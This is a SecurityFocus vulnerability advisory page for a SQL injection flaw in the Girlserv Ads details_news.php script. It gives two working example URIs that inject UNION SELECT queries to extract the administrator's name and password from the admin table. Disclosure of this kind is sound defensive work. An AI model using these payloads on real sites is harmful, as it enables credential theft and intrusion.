Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Girlserv Ads Details_News.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
http://www.example.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*







 

Privacy Statement
Copyright 2009, SecurityFocus